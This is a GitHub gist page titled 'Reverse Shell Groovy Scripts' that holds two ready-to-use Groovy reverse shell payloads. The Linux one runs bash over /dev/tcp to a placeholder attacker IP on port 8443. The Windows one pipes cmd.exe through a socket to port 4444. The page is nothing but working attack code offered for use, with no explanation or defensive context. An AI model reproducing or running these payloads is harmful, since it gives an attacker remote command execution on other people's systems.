Skip to content

Instantly share code, notes, and snippets.

@rootsecdev
Last active February 19, 2024 09:20
Show Gist options
  • Save rootsecdev/273f22a747753e2b17a2fd19c248c4b7 to your computer and use it in GitHub Desktop.
Save rootsecdev/273f22a747753e2b17a2fd19c248c4b7 to your computer and use it in GitHub Desktop.
Reverse Shell Groovy Scripts

Groovy script for reverse shell (Linux):

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/your_attacker_ip/8443;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[]) p.waitFor()

Groovy script for reverse shell (Windows):

String host="your_attacker_ip"; int port=4444; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment